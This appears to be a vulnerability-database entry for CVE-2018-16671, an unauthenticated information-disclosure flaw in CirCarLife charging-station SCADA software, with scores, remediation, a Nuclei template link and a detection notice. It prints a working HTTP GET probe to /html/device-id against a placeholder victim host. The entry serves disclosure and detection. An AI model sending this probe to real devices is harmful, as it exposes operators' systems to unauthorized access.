🔙 목록으로 돌아가기

CVE-2018-16671: CirCarLife <4.3 - Improper Authentication

TitleCirCarLife <4.3 - Improper Authentication
Authorgeeknik
SeverityMedium
ImpactSuccessful exploitation of this vulnerability can lead to unauthorized access to sensitive data, compromising the confidentiality and integrity of the system.
RemediationUpgrade CirCarLife to version 4.3 or higher to fix the improper authentication issue.
CVSS Score5.3
EPSS Score0.42489
CVE IDCVE-2018-16671
CWE IDCWE-200
Tags cve2018 cve iot disclosure edb circarlife scada circontrol vuln

🔍 Vulnerability Description

CirCarLife before 4.3 is susceptible to improper authentication. A system software information disclosure exists due to lack of authentication for /html/device-id. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations.

🌐 HTTP Request

GET /html/device-id HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-16671.yaml

🦈 Packet Capture: ⬇️ Download cve-2018-16671.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A